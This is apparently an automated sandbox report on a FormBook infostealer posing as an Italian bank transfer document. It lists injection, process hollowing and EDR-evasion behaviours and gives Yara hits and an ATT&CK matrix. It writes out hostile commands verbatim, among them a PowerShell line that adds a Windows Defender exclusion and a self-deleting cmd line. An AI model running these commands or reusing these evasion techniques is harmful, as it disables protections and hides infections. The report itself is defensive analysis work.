          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010CEA80 mov eax, dword ptr fs:[00000030h]6_2_010CEA80
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_01194A80 mov eax, dword ptr fs:[00000030h]6_2_01194A80
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010F8A90 mov edx, dword ptr fs:[00000030h]6_2_010F8A90
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010C8AA0 mov eax, dword ptr fs:[00000030h]6_2_010C8AA0
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010C8AA0 mov eax, dword ptr fs:[00000030h]6_2_010C8AA0
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_01116AA4 mov eax, dword ptr fs:[00000030h]6_2_01116AA4
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010C0AD0 mov eax, dword ptr fs:[00000030h]6_2_010C0AD0
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_01116ACC mov eax, dword ptr fs:[00000030h]6_2_01116ACC
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_01116ACC mov eax, dword ptr fs:[00000030h]6_2_01116ACC
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_01116ACC mov eax, dword ptr fs:[00000030h]6_2_01116ACC
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010F4AD0 mov eax, dword ptr fs:[00000030h]6_2_010F4AD0
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010F4AD0 mov eax, dword ptr fs:[00000030h]6_2_010F4AD0
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010FAAEE mov eax, dword ptr fs:[00000030h]6_2_010FAAEE
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010FAAEE mov eax, dword ptr fs:[00000030h]6_2_010FAAEE
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_01178D10 mov eax, dword ptr fs:[00000030h]6_2_01178D10
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_01178D10 mov eax, dword ptr fs:[00000030h]6_2_01178D10
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010DAD00 mov eax, dword ptr fs:[00000030h]6_2_010DAD00
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010DAD00 mov eax, dword ptr fs:[00000030h]6_2_010DAD00
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010DAD00 mov eax, dword ptr fs:[00000030h]6_2_010DAD00
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010F4D1D mov eax, dword ptr fs:[00000030h]6_2_010F4D1D
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010B6D10 mov eax, dword ptr fs:[00000030h]6_2_010B6D10
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010B6D10 mov eax, dword ptr fs:[00000030h]6_2_010B6D10
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010B6D10 mov eax, dword ptr fs:[00000030h]6_2_010B6D10
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_01148D20 mov eax, dword ptr fs:[00000030h]6_2_01148D20
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010C8D59 mov eax, dword ptr fs:[00000030h]6_2_010C8D59
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010C8D59 mov eax, dword ptr fs:[00000030h]6_2_010C8D59
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010C8D59 mov eax, dword ptr fs:[00000030h]6_2_010C8D59
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010C8D59 mov eax, dword ptr fs:[00000030h]6_2_010C8D59
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010C8D59 mov eax, dword ptr fs:[00000030h]6_2_010C8D59
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010C0D59 mov eax, dword ptr fs:[00000030h]6_2_010C0D59
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010C0D59 mov eax, dword ptr fs:[00000030h]6_2_010C0D59
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010C0D59 mov eax, dword ptr fs:[00000030h]6_2_010C0D59
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_01158D6B mov eax, dword ptr fs:[00000030h]6_2_01158D6B
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010F6DA0 mov eax, dword ptr fs:[00000030h]6_2_010F6DA0
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010E8DBF mov eax, dword ptr fs:[00000030h]6_2_010E8DBF
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010E8DBF mov eax, dword ptr fs:[00000030h]6_2_010E8DBF
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_01194DAD mov eax, dword ptr fs:[00000030h]6_2_01194DAD
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_01188DAE mov eax, dword ptr fs:[00000030h]6_2_01188DAE
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_01188DAE mov eax, dword ptr fs:[00000030h]6_2_01188DAE
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010FCDB1 mov ecx, dword ptr fs:[00000030h]6_2_010FCDB1
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010FCDB1 mov eax, dword ptr fs:[00000030h]6_2_010FCDB1
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010FCDB1 mov eax, dword ptr fs:[00000030h]6_2_010FCDB1
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_01144DD7 mov eax, dword ptr fs:[00000030h]6_2_01144DD7
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_01144DD7 mov eax, dword ptr fs:[00000030h]6_2_01144DD7
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010EEDD3 mov eax, dword ptr fs:[00000030h]6_2_010EEDD3
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010EEDD3 mov eax, dword ptr fs:[00000030h]6_2_010EEDD3
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010BCDEA mov eax, dword ptr fs:[00000030h]6_2_010BCDEA
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010BCDEA mov eax, dword ptr fs:[00000030h]6_2_010BCDEA
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_01160DF0 mov eax, dword ptr fs:[00000030h]6_2_01160DF0
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_01160DF0 mov eax, dword ptr fs:[00000030h]6_2_01160DF0
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010CADE0 mov eax, dword ptr fs:[00000030h]6_2_010CADE0
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010CADE0 mov eax, dword ptr fs:[00000030h]6_2_010CADE0
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010CADE0 mov eax, dword ptr fs:[00000030h]6_2_010CADE0
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_00223E2E GetProcessHeap,HeapFree,8_2_00223E2E
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_002242F0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,8_2_002242F0
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_00224550 SetUnhandledExceptionFilter,8_2_00224550
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeMemory allocated: page read and write | page guardJump to behavior

          HIPS / PFW / Operating System Protection Evasion

          barindex
          Adds a directory exclusion to Windows Defender
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe"
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe"Jump to behavior
          Found direct / indirect Syscall (likely to bypass EDR)
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeNtClose: Indirect: 0x107A56C
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeNtQueueApcThread: Indirect: 0x107A4F2Jump to behavior
          Injects a PE file into a foreign processes
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeMemory written: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe base: 400000 value starts with: 4D5AJump to behavior
          Maps a DLL or memory area into another process
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeSection loaded: NULL target: C:\Windows\SysWOW64\control.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeSection loaded: NULL target: C:\Windows\SysWOW64\control.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\control.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: read writeJump to behavior
          Source: C:\Windows\SysWOW64\control.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Modifies the context of a thread in another process (thread injection)
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeThread register set: target process: 2592Jump to behavior
          Source: C:\Windows\SysWOW64\control.exeThread register set: target process: 2592Jump to behavior
          Queues an APC in another process (thread injection)
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeThread APC queued: target process: C:\Windows\explorer.exeJump to behavior
          Sample uses process hollowing technique
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeSection unmapped: C:\Windows\SysWOW64\control.exe base address: 220000Jump to behavior
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe"Jump to behavior
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeProcess created: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe "C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe"Jump to behavior
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeProcess created: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe "C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe"Jump to behavior
          Source: C:\Windows\SysWOW64\control.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe"Jump to behavior
          Source: explorer.exe, 00000007.00000002.3765982163.0000000000BB0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000000.1362027793.0000000004040000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1367583891.00000000088B8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000007.00000002.3765982163.0000000000BB0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000000.1359553518.0000000000BB0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000007.00000000.1359239004.00000000005A8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3765674382.00000000005A0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ProgmanZw
          Source: explorer.exe, 00000007.00000002.3765982163.0000000000BB0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000000.1359553518.0000000000BB0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
          Source: explorer.exe, 00000007.00000002.3765982163.0000000000BB0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000000.1359553518.0000000000BB0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: yProgram Manager
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeQueries volume information: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_00224775 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,8_2_00224775
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

          Stealing of Sensitive Information

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 6.2.Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000008.00000002.3765357944.0000000002530000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.1420736628.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.3766029603.0000000002BF0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.1362056479.000000000389E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.3765947649.0000000002BC0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

          Remote Access Functionality

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 6.2.Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000008.00000002.3765357944.0000000002530000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.1420736628.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.3766029603.0000000002BF0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.1362056479.000000000389E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.3765947649.0000000002BC0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

          Mitre Att&ck Matrix

          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
          Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
          Shared Modules          		1
          DLL Side-Loading          		1
          Abuse Elevation Control Mechanism          		11
          Disable or Modify Tools          		1
          Credential API Hooking          		1
          System Time Discovery          		Remote Services1
          Archive Collected Data          		4
          Ingress Tool Transfer          		Exfiltration Over Other Network MediumAbuse Accessibility Features
          CredentialsDomainsDefault Accounts2
          Command and Scripting Interpreter          		Boot or Logon Initialization Scripts1
          DLL Side-Loading          		1
          Deobfuscate/Decode Files or Information          		LSASS Memory1
          File and Directory Discovery          		Remote Desktop Protocol1
          Credential API Hooking          		1
          Encrypted Channel          		Exfiltration Over BluetoothNetwork Denial of Service
          Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)512
          Process Injection          		1
          Abuse Elevation Control Mechanism          		Security Account Manager213
          System Information Discovery          		SMB/Windows Admin SharesData from Network Shared Drive3
          Non-Application Layer Protocol          		Automated ExfiltrationData Encrypted for Impact
          Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook4
          Obfuscated Files or Information          		NTDS241
          Security Software Discovery          		Distributed Component Object ModelInput Capture13
          Application Layer Protocol          		Traffic DuplicationData Destruction
          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script12
          Software Packing          		LSA Secrets2
          Process Discovery          		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
          Timestomp          		Cached Domain Credentials41
